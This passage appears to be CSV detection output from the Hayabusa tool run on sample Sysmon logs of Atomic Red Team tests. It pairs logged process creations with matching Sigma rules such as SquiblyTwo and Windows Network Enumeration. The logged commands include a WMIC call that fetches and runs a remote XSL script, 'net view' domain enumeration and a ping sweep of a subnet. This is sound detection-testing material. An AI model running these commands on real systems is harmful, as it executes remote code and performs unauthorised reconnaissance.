/FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 
747F3D96-D8DA-5D31-0000-0010D3833300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 
747F3D96-D8DA-5D31-0000-00100D8A3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 747F3D96-D8DD-5D31-0000-001043953300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1988 | PGUID: 
747F3D96-D8EA-5D31-0000-001030B63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-D8F6-5D31-0000-00100FCB3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 
747F3D96-D8F6-5D31-0000-001091D13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 747F3D96-D8F7-5D31-0000-0010EDD33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 747F3D96-D8F7-5D31-0000-0010E3D83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 
0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D8F9-5D31-0000-001073EA3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 
-w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for 
/l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D8FF-5D31-0000-00100E1A3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 747F3D96-D902-5D31-0000-0010B2393400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 
1 -w 100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.507 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D906-5D31-0000-001029513400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 
